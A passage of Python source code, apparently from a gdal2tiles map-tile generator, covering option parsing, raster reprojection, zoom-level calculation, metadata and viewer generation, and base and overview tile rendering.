help="Zoom levels to render (format:'2-5' or '10')."
)
p.add_option('-e', '--resume', dest='resume',
action='store_true',
help='Resume mode. Generate only missing files.')
p.add_option('-a', '--srcnodata', dest='srcnodata',
metavar='NODATA',
help='NODATA transparency value to assign to the input data'
)
p.add_option('-d', '--tmscompatible', dest='tmscompatible',
action='store_true',
help='When using the geodetic profile, specifies the base resolution as 0.703125 or 2 tiles at zoom level 0.'
)
p.add_option('-l', '--leaflet', action='store_true',
dest='leaflet',
help="Set 0,0 point to north. For use with 'leaflet'. Requires -p raster. "
)
p.add_option('--processes', dest='processes', type='int',
default=multiprocessing.cpu_count(),
help='Number of concurrent processes (defaults to the number of cores in the system)'
)
p.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='print status messages to stdout')
# KML options
g = OptionGroup(p, 'KML (Google Earth) options',
'Options for generated Google Earth SuperOverlay metadata'
)
g.add_option('-k', '--force-kml', dest='kml',
action='store_true',
help="Generate KML for Google Earth - default for 'geodetic' profile and 'raster' in EPSG:4326. For a dataset with different projection use with caution!"
)
g.add_option('-n', '--no-kml', dest='kml', action='store_false'
,
help='Avoid automatic generation of KML files for EPSG:4326'
)
g.add_option('-u', '--url', dest='url',
help='URL address where the generated tiles are going to be published'
)
p.add_option_group(g)
# HTML options
g = OptionGroup(p, 'Web viewer options',
'Options for generated HTML viewers a la Google Maps'
)
g.add_option(
'-w',
'--webviewer',
dest='webviewer',
type='choice',
choices=webviewer_list,
help="Web viewer to generate (%s) - default 'all'"
% ','.join(webviewer_list),
)
g.add_option('-t', '--title', dest='title',
help='Title of the map')
g.add_option('-c', '--copyright', dest='copyright',
help='Copyright for the map')
g.add_option('-g', '--googlekey', dest='googlekey',
help='Google Maps API key from http://code.google.com/apis/maps/signup.html'
)
(g.add_option('-b', '--bingkey', dest='bingkey',
help='Bing Maps API key from https://www.bingmapsportal.com/'
), )
p.add_option_group(g)
# TODO: MapFile + TileIndexes per zoom level for efficient MapServer WMS
# g = OptionGroup(p, "WMS MapServer metadata", "Options for generated mapfile and tileindexes for MapServer")
# g.add_option("-i", "--tileindex", dest='wms', action="store_true"
# help="Generate tileindex and mapfile for MapServer (WMS)")
# p.add_option_group(g)
p.set_defaults(
verbose=False,
profile='mercator',
kml=False,
url='',
webviewer='all',
copyright='',
resampling='average',
resume=False,
googlekey='INSERT_YOUR_KEY_HERE',
bingkey='INSERT_YOUR_KEY_HERE',
)
self.parser = p
# -------------------------------------------------------------------------
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
gdal.UseExceptions()
gdal.AllRegister()
if not self.options.verbose:
gdal.PushErrorHandler('CPLQuietErrorHandler')
# Initialize necessary GDAL drivers
self.out_drv = gdal.GetDriverByName(self.tiledriver)
self.mem_drv = gdal.GetDriverByName('MEM')
if not self.out_drv:
raise Exception("The '%s' driver was not found, is it available in this GDAL build?"
, self.tiledriver)
if not self.mem_drv:
raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?"
)
# Open the input file
if self.input:
self.in_ds = gdal.Open(self.input, gdal.GA_ReadOnly)
else:
raise Exception('No input file was specified')
if self.options.verbose:
print ('Input file:', '( %sP x %sL - %s bands)'
% (self.in_ds.RasterXSize, self.in_ds.RasterYSize,
self.in_ds.RasterCount))
if not self.in_ds:
# Note: GDAL prints the ERROR message too
self.error("It is not possible to open the input file '%s'."
% self.input)
# Read metadata from the input file
if self.in_ds.RasterCount == 0:
self.error("Input file '%s' has no raster band"
% self.input)
if self.in_ds.GetRasterBand(1).GetRasterColorTable():
# TODO: Process directly paletted dataset by generating VRT in memory
self.error('Please convert this file to RGB/RGBA and run gdal2tiles on the result.'
,
"""From paletted file you can create RGBA file (temp.vrt) by:
gdal_translate -of vrt -expand rgba %s temp.vrt
then run:
gdal2tiles temp.vrt"""
% self.input)
# Get NODATA value
self.in_nodata = []
for i in range(1, self.in_ds.RasterCount + 1):
if self.in_ds.GetRasterBand(i).GetNoDataValue() != None:
self.in_nodata.append(self.in_ds.GetRasterBand(i).GetNoDataValue())
if self.options.srcnodata:
nds = list(map(float, self.options.srcnodata.split(',')))
if len(nds) < self.in_ds.RasterCount:
self.in_nodata = (nds
* self.in_ds.RasterCount)[:self.in_ds.RasterCount]
else:
self.in_nodata = nds
if self.options.verbose:
print 'NODATA: %s' % self.in_nodata
#
# Here we should have RGBA input dataset opened in self.in_ds
#
if self.options.verbose:
print ('Preprocessed file:', '( %sP x %sL - %s bands)'
% (self.in_ds.RasterXSize, self.in_ds.RasterYSize,
self.in_ds.RasterCount))
# Spatial Reference System of the input raster
self.in_srs = None
if self.options.s_srs:
self.in_srs = osr.SpatialReference()
self.in_srs.SetFromUserInput(self.options.s_srs)
self.in_srs_wkt = self.in_srs.ExportToWkt()
else:
self.in_srs_wkt = self.in_ds.GetProjection()
if not self.in_srs_wkt and self.in_ds.GetGCPCount() != 0:
self.in_srs_wkt = self.in_ds.GetGCPProjection()
if self.in_srs_wkt:
self.in_srs = osr.SpatialReference()
self.in_srs.ImportFromWkt(self.in_srs_wkt)
# elif self.options.profile != 'raster':
# self.error("There is no spatial reference system info included in the input file.","You should run gdal2tiles with --s_srs EPSG:XXXX or similar.")
# Spatial Reference System of tiles
self.out_srs = osr.SpatialReference()
if self.options.profile == 'mercator':
self.out_srs.ImportFromEPSG(900913)
elif self.options.profile == 'geodetic':
self.out_srs.ImportFromEPSG(4326)
else:
self.out_srs = self.in_srs
# Are the reference systems the same? Reproject if necessary.
self.out_ds = None
if self.options.profile in ('mercator', 'geodetic'):
if self.in_ds.GetGeoTransform() == (
0.0,
1.0,
0.0,
0.0,
0.0,
1.0,
) and self.in_ds.GetGCPCount() == 0:
self.error("There is no georeference - neither affine transformation (worldfile) nor GCPs. You can generate only 'raster' profile tiles."
,
"Either gdal2tiles with parameter -p 'raster' or use another GIS software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
)
if self.in_srs:
if self.in_srs.ExportToProj4() \
!= self.out_srs.ExportToProj4() \
or self.in_ds.GetGCPCount() != 0:
# Generation of VRT dataset in tile projection, default 'nearest neighbour' warping
self.out_ds = gdal.AutoCreateWarpedVRT(self.in_ds,
self.in_srs_wkt, self.out_srs.ExportToWkt())
# TODO: HIGH PRIORITY: Correction of AutoCreateWarpedVRT according the max zoomlevel for correct direct warping!!!
if self.options.verbose:
print "Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')"
self.out_ds.GetDriver().CreateCopy('tiles.vrt',
self.out_ds)
# Note: self.in_srs and self.in_srs_wkt contain still the non-warped reference system!!!
# Correction of AutoCreateWarpedVRT for NODATA values
if self.in_nodata != []:
(fd, tempfilename) = \
tempfile.mkstemp('-gdal2tiles.vrt')
self.out_ds.GetDriver().CreateCopy(tempfilename,
self.out_ds)
# open as a text file
s = open(tempfilename).read()
# Add the warping options
s = s.replace("""<GDALWarpOptions>""",
"""<GDALWarpOptions>
<Option name="INIT_DEST">NO_DATA</Option>
<Option name="UNIFIED_SRC_NODATA">YES</Option>""")
# replace BandMapping tag for NODATA bands....
for i in range(len(self.in_nodata)):
s = \
s.replace("""<BandMapping src="%i" dst="%i"/>"""
% (i + 1, i + 1),
"""<BandMapping src="%i" dst="%i">
<SrcNoDataReal>%i</SrcNoDataReal>
<SrcNoDataImag>0</SrcNoDataImag>
<DstNoDataReal>%i</DstNoDataReal>
<DstNoDataImag>0</DstNoDataImag>
</BandMapping>"""
% (i + 1, i + 1, self.in_nodata[i],
self.in_nodata[i])) # Or rewrite to white by: , 255 ))
# save the corrected VRT
open(tempfilename, 'w').write(s)
# open by GDAL as self.out_ds
self.out_ds = gdal.Open(tempfilename) # , gdal.GA_ReadOnly)
# delete the temporary file
os.unlink(tempfilename)
# set NODATA_VALUE metadata
self.out_ds.SetMetadataItem('NODATA_VALUES',
'%i %i %i' % (self.in_nodata[0],
self.in_nodata[1], self.in_nodata[2]))
if self.options.verbose:
print "Modified warping result saved into 'tiles1.vrt'"
open('tiles1.vrt', 'w').write(s)
# -----------------------------------
# Correction of AutoCreateWarpedVRT for Mono (1 band) and RGB (3 bands) files without NODATA:
# equivalent of gdalwarp -dstalpha
if self.in_nodata == [] and self.out_ds.RasterCount \
in [1, 3]:
(fd, tempfilename) = \
tempfile.mkstemp('-gdal2tiles.vrt')
self.out_ds.GetDriver().CreateCopy(tempfilename,
self.out_ds)
# open as a text file
s = open(tempfilename).read()
# Add the warping options
s = s.replace("""<BlockXSize>""",
"""<VRTRasterBand dataType="Byte" band="%i" subClass="VRTWarpedRasterBand">
<ColorInterp>Alpha</ColorInterp>
</VRTRasterBand>
<BlockXSize>"""
% (self.out_ds.RasterCount + 1))
s = s.replace("""</GDALWarpOptions>""",
"""<DstAlphaBand>%i</DstAlphaBand>
</GDALWarpOptions>"""
% (self.out_ds.RasterCount + 1))
s = s.replace("""</WorkingDataType>""",
"""</WorkingDataType>
<Option name="INIT_DEST">0</Option>"""
)
# save the corrected VRT
open(tempfilename, 'w').write(s)
# open by GDAL as self.out_ds
self.out_ds = gdal.Open(tempfilename) # , gdal.GA_ReadOnly)
# delete the temporary file
os.unlink(tempfilename)
if self.options.verbose:
print "Modified -dstalpha warping result saved into 'tiles1.vrt'"
open('tiles1.vrt', 'w').write(s)
s = '''
'''
else:
self.error('Input file has unknown SRS.',
'Use --s_srs ESPG:xyz (or similar) to provide source reference system.'
)
if self.out_ds and self.options.verbose:
print ('Projected file:', 'tiles.vrt',
'( %sP x %sL - %s bands)'
% (self.out_ds.RasterXSize,
self.out_ds.RasterYSize,
self.out_ds.RasterCount))
if not self.out_ds:
self.out_ds = self.in_ds
#
# Here we should have a raster (out_ds) in the correct Spatial Reference system
#
# Get alpha band (either directly or from NODATA value)
self.alphaband = self.out_ds.GetRasterBand(1).GetMaskBand()
if self.alphaband.GetMaskFlags() & gdal.GMF_ALPHA \
or self.out_ds.RasterCount == 4 or self.out_ds.RasterCount \
== 2:
# TODO: Better test for alpha band in the dataset
self.dataBandsCount = self.out_ds.RasterCount - 1
else:
self.dataBandsCount = self.out_ds.RasterCount
# KML test
self.isepsg4326 = False
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if self.out_srs and srs4326.ExportToProj4() \
== self.out_srs.ExportToProj4():
self.kml = True
self.isepsg4326 = True
if self.options.verbose:
print 'KML autotest OK!'
# Read the georeference
self.out_gt = self.out_ds.GetGeoTransform()
# originX, originY = self.out_gt[0], self.out_gt[3]
# pixelSize = self.out_gt[1] # = self.out_gt[5]
# Test the size of the pixel
# MAPTILER - COMMENTED
# if self.out_gt[1] != (-1 * self.out_gt[5]) and self.options.profile != 'raster':
# TODO: Process corectly coordinates with are have swichted Y axis (display in OpenLayers too)
# self.error("Size of the pixel in the output differ for X and Y axes.")
# Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
self.error('Georeference of the raster contains rotation or skew. Such raster is not supported. Please use gdalwarp first.'
)
# TODO: Do the warping in this case automaticaly
#
# Here we expect: pixel is square, no rotation on the raster
#
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.out_ds.RasterXSize \
* self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.out_ds.RasterYSize \
* self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15
if self.options.verbose:
print ('Bounds (output srs):', round(self.ominx, 13),
self.ominy, self.omaxx, self.omaxy)
#
# Calculating ranges for tiles in different zoom levels
#
if self.options.profile == 'mercator':
self.mercator = GlobalMercator() # from globalmaptiles.py
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.mercator.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
(tminx, tminy) = self.mercator.MetersToTile(self.ominx,
self.ominy, tz)
(tmaxx, tmaxy) = self.mercator.MetersToTile(self.omaxx,
self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
(tminx, tminy) = (max(0, tminx), max(0, tminy))
(tmaxx, tmaxy) = (min(2 ** tz - 1, tmaxx), min(2 ** tz
- 1, tmaxy))
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz == None:
self.tminz = \
self.mercator.ZoomForPixelSize(self.out_gt[1]
* max(self.out_ds.RasterXSize,
self.out_ds.RasterYSize) / float(self.tilesize))
# Get the maximal zoom level (closest possible zoom level up on the resolution of raster)
if self.tmaxz == None:
self.tmaxz = \
self.mercator.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print ('Bounds (latlong):',
self.mercator.MetersToLatLon(self.ominx,
self.ominy),
self.mercator.MetersToLatLon(self.omaxx,
self.omaxy))
print ('MinZoomLevel:', self.tminz)
print ('MaxZoomLevel:', self.tmaxz, '(',
self.mercator.Resolution(self.tmaxz), ')')
if self.options.profile == 'geodetic':
self.geodetic = GlobalGeodetic(self.options.tmscompatible) # from globalmaptiles.py
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.geodetic.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
(tminx, tminy) = self.geodetic.LonLatToTile(self.ominx,
self.ominy, tz)
(tmaxx, tmaxy) = self.geodetic.LonLatToTile(self.omaxx,
self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
(tminx, tminy) = (max(0, tminx), max(0, tminy))
(tmaxx, tmaxy) = (min(2 ** (tz + 1) - 1, tmaxx), min(2
** tz - 1, tmaxy))
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the maximal zoom level (closest possible zoom level up on the resolution of raster)
if self.tminz == None:
self.tminz = \
self.geodetic.ZoomForPixelSize(self.out_gt[1]
* max(self.out_ds.RasterXSize,
self.out_ds.RasterYSize) / float(self.tilesize))
# Get the maximal zoom level (closest possible zoom level up on the resolution of raster)
if self.tmaxz == None:
self.tmaxz = \
self.geodetic.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print ('Bounds (latlong):', self.ominx, self.ominy,
self.omaxx, self.omaxy)
if self.options.profile == 'raster':
log2 = lambda x: math.log10(x) / math.log10(2) # log2 (base 2 logarithm)
self.nativezoom = \
int(max(math.ceil(log2(self.out_ds.RasterXSize
/ float(self.tilesize))),
math.ceil(log2(self.out_ds.RasterYSize
/ float(self.tilesize)))))
if self.tmaxz < self.nativezoom:
self.tmaxz = self.nativezoom
if self.options.verbose:
print ('Native zoom of the raster:', self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz == None:
self.tminz = 0
# Get the maximal zoom level (native resolution of the raster)
if self.tmaxz == None:
self.tmaxz = self.nativezoom
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, self.tmaxz + 1))
self.tsize = list(range(0, self.tmaxz + 1))
for tz in range(0, self.tmaxz + 1):
tsize = 2.0 ** (self.nativezoom - tz) * self.tilesize
(tminx, tminy) = (0, 0)
tmaxx = int(math.ceil(self.out_ds.RasterXSize / tsize)) \
- 1
tmaxy = int(math.ceil(self.out_ds.RasterYSize / tsize)) \
- 1
self.tsize[tz] = math.ceil(tsize)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Function which generates SWNE in LatLong for given tile
if self.kml and self.in_srs_wkt:
self.ct = osr.CoordinateTransformation(self.in_srs,
srs4326)
def rastertileswne(x, y, z):
pixelsizex = 2 ** (self.tmaxz - z) * self.out_gt[1] # X-pixel size in level
pixelsizey = 2 ** (self.tmaxz - z) * self.out_gt[1] # Y-pixel size in level (usually -1*pixelsizex)
west = self.out_gt[0] + x * self.tilesize \
* pixelsizex
east = west + self.tilesize * pixelsizex
south = self.ominy + y * self.tilesize * pixelsizex
north = south + self.tilesize * pixelsizex
if not self.isepsg4326:
# Transformation to EPSG:4326 (WGS84 datum)
(west, south) = self.ct.TransformPoint(west,
south)[:2]
(east, north) = self.ct.TransformPoint(east,
north)[:2]
return (south, west, north, east)
self.tileswne = rastertileswne
else:
self.tileswne = lambda x, y, z: (0, 0, 0, 0)
# -------------------------------------------------------------------------
def generate_metadata(self):
"""Generation of main metadata files and HTML viewers (metadata related to particular tiles are generated during the tile processing)."""
if not os.path.exists(self.output):
os.makedirs(self.output)
if self.options.profile == 'mercator':
(south, west) = self.mercator.MetersToLatLon(self.ominx,
self.ominy)
(north, east) = self.mercator.MetersToLatLon(self.omaxx,
self.omaxy)
(south, west) = (max(-85.05112878, south), max(-180.0,
west))
(north, east) = (min(85.05112878, north), min(180.0, east))
self.swne = (south, west, north, east)
# Generate googlemaps.html
if self.options.webviewer in ('all', 'google') \
and self.options.profile == 'mercator':
if not self.options.resume \
or not os.path.exists(os.path.join(self.output,
'googlemaps.html')):
f = open(os.path.join(self.output, 'googlemaps.html'
), 'w')
f.write(self.generate_googlemaps())
f.close()
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if not self.options.resume \
or not os.path.exists(os.path.join(self.output,
'openlayers.html')):
f = open(os.path.join(self.output, 'openlayers.html'
), 'w')
f.write(self.generate_openlayers())
f.close()
elif self.options.profile == 'geodetic':
(west, south) = (self.ominx, self.ominy)
(east, north) = (self.omaxx, self.omaxy)
(south, west) = (max(-90.0, south), max(-180.0, west))
(north, east) = (min(90.0, north), min(180.0, east))
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if not self.options.resume \
or not os.path.exists(os.path.join(self.output,
'openlayers.html')):
f = open(os.path.join(self.output, 'openlayers.html'
), 'w')
f.write(self.generate_openlayers())
f.close()
elif self.options.profile == 'raster':
(west, south) = (self.ominx, self.ominy)
(east, north) = (self.omaxx, self.omaxy)
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if not self.options.resume \
or not os.path.exists(os.path.join(self.output,
'openlayers.html')):
f = open(os.path.join(self.output, 'openlayers.html'
), 'w')
f.write(self.generate_openlayers())
f.close()
# Generate tilemapresource.xml.
if not self.options.resume \
or not os.path.exists(os.path.join(self.output,
'tilemapresource.xml')):
f = open(os.path.join(self.output, 'tilemapresource.xml'),
'w')
f.write(self.generate_tilemapresource())
f.close()
if self.kml:
# TODO: Maybe problem for not automatically generated tminz
# The root KML should contain links to all tiles in the tminz level
children = []
(xmin, ymin, xmax, ymax) = self.tminmax[self.tminz]
for x in range(xmin, xmax + 1):
for y in range(ymin, ymax + 1):
children.append([x, y, self.tminz])
# Generate Root KML
if self.kml:
if not self.options.resume \
or not os.path.exists(os.path.join(self.output,
'doc.kml')):
f = open(os.path.join(self.output, 'doc.kml'), 'w')
f.write(self.generate_kml(None, None, None,
children))
f.close()
# -------------------------------------------------------------------------
def generate_base_tiles(self, cpu):
"""Generation of the base tiles (the lowest in the pyramid) directly from the input raster"""
if self.options.verbose:
# mx, my = self.out_gt[0], self.out_gt[3] # OriginX, OriginY
# px, py = self.mercator.MetersToPixels( mx, my, self.tmaxz)
# print "Pixel coordinates:", px, py, (mx, my)
print ''
print 'Tiles generated from the max zoom level:'
print '----------------------------------------'
print ''
# Set the bounds
(tminx, tminy, tmaxx, tmaxy) = self.tminmax[self.tmaxz]
# Just the center tile
# tminx = tminx+ (tmaxx - tminx)/2
# tminy = tminy+ (tmaxy - tminy)/2
# tmaxx = tminx
# tmaxy = tminy
ds = self.out_ds
tilebands = self.dataBandsCount + 1
querysize = self.querysize
if self.options.verbose:
print ('dataBandsCount: ', self.dataBandsCount)
print ('tilebands: ', tilebands)
# print tminx, tminy, tmaxx, tmaxy
tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
# print tcount
ti = 0
yrange = range(tmaxy, tminy - 1, -1)
if self.options.leaflet:
yrange = range(tminy, tmaxy + 1)
tz = self.tmaxz
for ty in yrange:
for tx in range(tminx, tmaxx + 1):
if self.stopped:
break
ti += 1
if (ti - 1) % self.options.processes != cpu:
continue
tilefilename = os.path.join(self.output, str(tz),
str(tx), '%s.%s' % (ty, self.tileext))
if self.options.verbose:
print (ti, '/', tcount, tilefilename) # , "( TileMapService: z / x / y )"
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print 'Tile generation skiped because of --resume'
else:
queue.put(tcount)
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
if self.options.profile == 'mercator':
# Tile bounds in EPSG:900913
b = self.mercator.TileBounds(tx, ty, tz)
elif self.options.profile == 'geodetic':
b = self.geodetic.TileBounds(tx, ty, tz)
# print "\tgdalwarp -ts 256 256 -te %s %s %s %s %s %s_%s_%s.tif" % ( b[0], b[1], b[2], b[3], "tiles.vrt", tz, tx, ty)
# Don't scale up by nearest neighbour, better change the querysize
# to the native resolution (and return smaller query tile) for scaling
if self.options.profile in ('mercator', 'geodetic'):
(rb, wb) = self.geo_query(ds, b[0], b[3], b[2],
b[1])
nativesize = wb[0] + wb[2] # Pixel size in the raster covering query geo extent
if self.options.verbose:
print ('\tNative Extent (querysize',
nativesize, '): ', rb, wb)
# Tile bounds in raster coordinates for ReadRaster query
(rb, wb) = self.geo_query(
ds,
b[0],
b[3],
b[2],
b[1],
querysize=querysize,
)
(rx, ry, rxsize, rysize) = rb
(wx, wy, wxsize, wysize) = wb
else:
# 'raster' profile:
tsize = int(self.tsize[tz]) # tilesize in raster coordinates for actual zoom
xsize = self.out_ds.RasterXSize # size of the raster in pixels
ysize = self.out_ds.RasterYSize
if tz >= self.nativezoom:
querysize = self.tilesize # int(2**(self.nativezoom-tz) * self.tilesize)
rx = tx * tsize
rxsize = 0
if tx == tmaxx:
rxsize = xsize % tsize
if rxsize == 0:
rxsize = tsize
rysize = 0
if ty == tmaxy:
rysize = ysize % tsize
if rysize == 0:
rysize = tsize
if self.options.leaflet:
ry = ty * tsize
else:
ry = ysize - ty * tsize - rysize
(wx, wy) = (0, 0)
(wxsize, wysize) = (int(rxsize / float(tsize)
* self.tilesize), int(rysize / float(tsize)
* self.tilesize))
if not self.options.leaflet:
if wysize != self.tilesize:
wy = self.tilesize - wysize
if self.options.verbose:
print ('\tReadRaster Extent: ', (rx, ry, rxsize,
rysize), (wx, wy, wxsize, wysize))
# Query is in 'nearest neighbour' but can be bigger in then the tilesize
# We scale down the query to the tilesize by supplied algorithm.
# Tile dataset in memory
dstile = self.mem_drv.Create('', self.tilesize,
self.tilesize, tilebands)
data = ds.ReadRaster(
rx,
ry,
rxsize,
rysize,
wxsize,
wysize,
band_list=list(range(1, self.dataBandsCount + 1)),
)
alpha = self.alphaband.ReadRaster(
rx,
ry,
rxsize,
rysize,
wxsize,
wysize,
)
if self.tilesize == querysize:
# Use the ReadRaster result directly in tiles ('nearest neighbour' query)
dstile.WriteRaster(
wx,
wy,
wxsize,
wysize,
data,
band_list=list(range(1, self.dataBandsCount
+ 1)),
)
dstile.WriteRaster(
wx,
wy,
wxsize,
wysize,
alpha,
band_list=[tilebands],
)
else:
# Note: For source drivers based on WaveLet compression (JPEG2000, ECW, MrSID)
# the ReadRaster function returns high-quality raster (not ugly nearest neighbour)
# TODO: Use directly 'near' for WaveLet files
# Big ReadRaster query in memory scaled to the tilesize - all but 'near' algo
dsquery = self.mem_drv.Create('', querysize,
querysize, tilebands)
# TODO: fill the null value in case a tile without alpha is produced (now only png tiles are supported)
# for i in range(1, tilebands+1):
# dsquery.GetRasterBand(1).Fill(tilenodata)
dsquery.WriteRaster(
wx,
wy,
wxsize,
wysize,
data,
band_list=list(range(1, self.dataBandsCount
+ 1)),
)
dsquery.WriteRaster(
wx,
wy,
wxsize,
wysize,
alpha,
band_list=[tilebands],
)
self.scale_query_to_tile(dsquery, dstile,
tilefilename)
del dsquery
del data
if self.options.resampling != 'antialias':
# Write a copy of tile to png/jpg
self.out_drv.CreateCopy(tilefilename, dstile,
strict=0)
del dstile
# Create a KML file for this tile.
if self.kml:
kmlfilename = os.path.join(self.output, str(tz),
str(tx), '%d.kml' % ty)
if not self.options.resume \
or not os.path.exists(kmlfilename):
f = open(kmlfilename, 'w')
f.write(self.generate_kml(tx, ty, tz))
f.close()
if not self.options.verbose:
queue.put(tcount)
# -------------------------------------------------------------------------
def generate_overview_tiles(self, cpu, tz):
"""Generation of the overview tiles (higher in the pyramid) based on existing tiles"""
tilebands = self.dataBandsCount + 1
# Usage of existing tiles: from 4 underlying tiles generate one as overview.
tcount = 0
for z in range(self.tmaxz - 1, self.tminz - 1, -1):
(tminx, tminy, tmaxx, tmaxy) = self.tminmax[z]
tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy
- tminy))
ti = 0
# querysize = tilesize * 2
(tminx, tminy, tmaxx, tmaxy) = self.tminmax[tz]
yrange = range(tmaxy, tminy - 1, -1)
if self.options.leaflet:
yrange = range(tminy, tmaxy + 1)
for ty in yrange:
for tx in range(tminx, tmaxx + 1):
if self.stopped:
break
ti += 1
if (ti - 1) % self.options.processes != cpu:
continue
tilefilename = os.path.join(self.output, str(tz),
str(tx), '%s.%s' % (ty, self.tileext))
if self.options.verbose:
print (ti, '/', tcount, tilefilename) # , "( TileMapService: z / x / y )"
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print 'Tile generation skiped because of --resume'
else:
queue.put(tcount)
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
dsquery = self.mem_drv.Create('', 2 * self.tilesize, 2
* self.tilesize, tilebands)
# TODO: fill the null value
# for i in range(1, tilebands+1):
# dsquery.GetRasterBand(1).Fill(tilenodata)
dstile = self.mem_drv.Create('', self.tilesize,
self.tilesize, tilebands)
# TODO: Implement more clever walking on the tiles with cache functionality
# probably walk should start with reading of four tiles from top left corner
# Hilbert curve
children = []
# Read the tiles and write them to query window
for y in range(2 * ty, 2 * ty + 2):
for x in range(2 * tx, 2 * tx + 2):
(minx, miny, maxx, maxy) = self.tminmax[tz + 1]
if x >= minx and x <= maxx and y >= miny and y \
<= maxy:
dsquerytile = \
gdal.Open(os.path.join(self.output,
str(tz + 1), str(x), '%s.%s' % (y,
self.tileext)), gdal.GA_ReadOnly)
if self.options.leaflet:
if ty:
tileposy = y % (2 * ty) \
* self.tilesize
elif ty == 0 and y == 1:
tileposy = self.tilesize
else:
tileposy = 0
else:
if ty == 0 and y == 1 or ty != 0 and y \
% (2 * ty) != 0:
tileposy = 0
else:
tileposy = self.tilesize
if tx:
tileposx = x % (2 * tx) * self.tilesize
elif tx == 0 and x == 1:
tileposx = self.tilesize
else:
tileposx = 0
dsquery.WriteRaster(
tileposx,
tileposy,
self.tilesize,
self.tilesize,
dsquerytile.ReadRaster(0, 0,
self.tilesize, self.tilesize),
band_list=list(range(1, tilebands
+ 1)),
)
children.append([x, y, tz + 1])
self.scale_query_to_tile(dsquery, dstile, tilefilename)
# Write a copy of tile to png/jpg
if self.options.resampling != 'antialias':
# Write a copy of tile to png/jpg
self.out_drv.CreateCopy(tilefilename, dstile,
strict=0)
if self.options.verbose:
print (
'\tbuild from zoom',
tz + 1,
' tiles:',
(2 * tx, 2 * ty),
(2 * tx + 1, 2 * ty),
(2 * tx, 2 * ty + 1),
(2 * tx + 1, 2 * ty + 1),
)
# Create a KML file for this tile.
if self.kml:
f = open(os.path.join(self.output, '%d/%d/%d.kml'
% (tz, tx, ty)), 'w')
f.write(self.generate_kml(tx, ty, tz, children))
f.close()
if not self.options.verbose:
queue.put(tcount)
# -------------------------------------------------------------------------
def geo_query(
self,
ds,
ulx,
uly,
lrx,
lry,
querysize=0,
):
"""For given dataset and query in cartographic coordinates
returns parameters for ReadRaster() in raster coordinates and
x/y shifts (for border tiles). If the querysize is not given, the
extent is returned in the native resolution of dataset ds."""
geotran = ds.GetGeoTransform()
rx = int((ulx - geotran[0]) / geotran[1] + 0.001)
ry = int((uly - geotran[3]) / geotran[5] + 0.001)
rxsize = int((lrx - ulx) / geotran[1] + 0.5)
rysize = int((lry - uly) / geotran[5] + 0.5)
if not querysize:
(wxsize, wysize) = (rxsize, rysize)
else:
(wxsize, wysize) = (querysize, querysize)
# Coordinates should not go out of the bounds of the raster
wx = 0
if rx < 0:
rxshift = abs(rx)
wx = int(wxsize * (float(rxshift) / rxsize))
wxsize = wxsize - wx
rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize))
rx = 0
if rx + rxsize > ds.RasterXSize:
wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
rxsize = ds.RasterXSize - rx
wy = 0
if ry < 0:
ryshift = abs(ry)
wy = int(wysize * (float(ryshift) / rysize))
wysize = wysize - wy
rysize = rysize - int(rysize * (float(ryshift) / rysize))
ry = 0
if ry + rysize > ds.RasterYSize:
wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
rysize = ds.RasterYSize - ry
return ((rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# -------------------------------------------------------------------------
def scale_query_to_tile(
self,
dsquery,
dstile,
tilefilename='',
):
"""Scales down query dataset to the tile dataset"""
querysize = dsquery.RasterXSize
tilesize = dstile.RasterXSize
tilebands = dstile.RasterCount
if self.options.resampling == 'average':
# Function: gdal.RegenerateOverview()
for i in range(1, tilebands + 1):
# Black border around NODATA
# if i != 4:
# dsquery.GetRasterBand(i).SetNoDataValue(0)
res = gdal.RegenerateOverview(dsquery.GetRasterBand(i),
dstile.GetRasterBand(i), 'average')
if res != 0:
self.error('RegenerateOverview() failed on %s, error %d'
% (tilefilename, res))
elif self.options.resampling == 'antialias':
# Scaling by PIL (Python Imaging Library) - improved Lanczos
